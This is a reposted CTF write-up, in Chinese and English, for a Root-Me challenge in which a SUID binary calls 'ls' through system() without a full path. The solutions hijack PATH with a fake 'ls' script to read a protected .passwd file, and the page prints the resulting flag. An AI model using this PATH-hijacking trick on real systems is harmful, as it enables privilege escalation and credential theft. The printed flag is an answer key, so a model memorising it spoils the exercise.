CTF-rootme 題解之Bash - System 2

本文轉載自查看原文 2019-03-15 13:00 561 CTF

LINK:https://www.root-me.org/en/Challenges/App-Script/ELF32-System-2

SourceCode:

    #include <stdlib.h>
    #include <stdio.h>
     
    int main(){
            system("ls -lA /challenge/app-script/ch12/.passwd");
            return 0;
    }

The target is to change 'ls' command as 'cat /challenge/app-script/ch12/.passwd'

the execution result change to:cat /challenge/app-script/ch12/.passwd -lA /challenge/app-script/ch12/.passwd

app-script-ch12@challenge02:~$ ls -l ch12

-r-sr-x--- 1 app-script-ch12-cracked app-script-ch12 7160 Aug 11 2015 ch12 (suid programm,could be execute as root)

Solution 1:

app-script-ch12@challenge02:~$mkdir /tmp/ch12/

app-script-ch12@challenge02:~$echo '#!/bin/sh' >/tmp/ch12/ls

app-script-ch12@challenge02:~$echo 'cat ' /challenge/app-script/ch12/.passwd >>/tmp/ch12/ls

app-script-ch12@challenge02:~$chmod +x /tmp/ch12/ls

app-script-ch12@challenge02:~$export PATH=/tmp/ch12/:$PATH

app-script-ch12@challenge02:~$/challenge/app-script/ch12/ch12

8a95eDS/*e_T#

Solution 2:

app-script-ch12@challenge02:~$mkdir /tmp/ch12/

app-script-ch12@challenge02:~$cp /bin/nano /tmp/ch12/

app-script-ch12@challenge02:~$export PATH=/tmp/ch12/:$PATH

app-script-ch12@challenge02:~$/challenge/app-script/ch12/ch12

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 CTF-rootme 題解之Python - input() CTF-rootme 題解之 Python - PyJail 1 CTF-rootme 題解之Hash - SHA-2 CTF-rootme 題解之ELF64 - PID encryption CTF-rootme 題解之APK - Anti-debug CTF入門題_題解 [極客大挑戰 2019]PHP CTF題解與分析 Bugku ctf Linux2&細心的大象題解【個人向】ctf比賽出的一道逆向游戲題——GameTime題解問題解決:bash: fork: retry: Resource temporarily unavailable